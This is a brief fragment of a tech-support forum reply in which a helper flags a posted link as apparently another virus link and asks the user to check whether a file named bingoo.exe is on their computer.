I will remove the information from your last post after writing that down.
That looks like another link to a virus
Can you see if bingoo.exe is present on your computer?
Regards,
Similar Topics
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users
As Featured On:
Sign In
Create Account
